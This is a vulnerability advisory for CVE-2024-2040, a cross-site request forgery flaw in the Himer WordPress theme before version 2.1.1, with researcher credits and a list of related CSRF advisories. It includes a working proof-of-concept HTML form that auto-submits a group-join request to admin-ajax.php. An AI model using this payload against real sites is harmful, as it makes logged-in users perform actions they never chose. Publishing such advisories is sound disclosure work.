Himer – Social Questions and Answers < 2.1.1 – Arbitrary Group Joining via CSRF | CVE 2024-2040 | Theme Vulnerabilities

Description

The theme does not have CSRF checks in some places, which could allow attackers to make users join private groups via a CSRF attack

Proof of Concept

A logged in user can join private groups by using an HTML file such as:
```
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpqa&#95;join&#95;group" />
      <input type="hidden" name="group&#95;id" value="__GROUP_ID_HERE__" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

Affects Themes

Fixed in 2.1.1

References

CVE

YouTube Video

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Sushmita Poudel

Submitter

Sushmita Poudel

Submitter website

https://susmitapoudel.com.np

Submitter twitter

poudelsushmita1

Verified

Yes

WPVDB ID

1b97bbf0-c7d1-4e6c-bb80-f9bf45fbfe1e

Timeline

Publicly Published

2024-06-12 (about 1 year ago)

Added

2024-06-12 (about 1 year ago)

Last Updated

2024-06-12 (about 1 year ago)

Other

Published

Title

Published

2022-11-10

Title

WP OAuth Server < 3.4.2 - Client Secret Regeneration via CSRF

Published

2024-10-21

Title

Google Docs RSVP <= 2.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-08-14

Title

CM On Demand Search And Replace < 1.5.3 - Cross-Site Request Forgery

Published

2024-12-11

Title

AutoWP < 2.0.9 - Cross-Site Request Forgery

Published

2025-01-16

Title

Error Notification <= 0.2.7 - Cross-Site Request Forgery to Stored Cross-Site Scripting